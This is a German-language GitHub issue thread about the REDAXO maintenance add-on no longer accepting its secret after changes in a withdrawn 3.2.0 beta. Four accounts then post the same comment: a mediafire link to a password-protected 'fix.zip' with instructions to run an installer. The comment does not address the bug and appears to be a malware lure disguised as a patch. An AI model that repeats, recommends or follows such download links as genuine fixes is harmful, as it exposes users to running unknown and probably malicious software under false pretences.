### ISSUE TITLE
Aktuelle Beta - Secret wird nicht mehr akzeptiert

### ISSUE THREAD

**Issue by alxndr-w** [FriendsOfREDAXO/maintenance#110]
**Description / Beschreibung**
Durch die Änderungen in #108 im Zuge der 3.2.0 (jetzt depubliziert) wird das Secret nicht mehr akzeptiert.

Das muss vor einem Release erst behoben werden.

Danke @iriswerner fürs Melden

**Affected versions / Verwendete Versionen**

REDAXO: 
PHP:
Database:
Browser: 
AddOns:

**Did it whoops? / Whoops erhalten?**

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
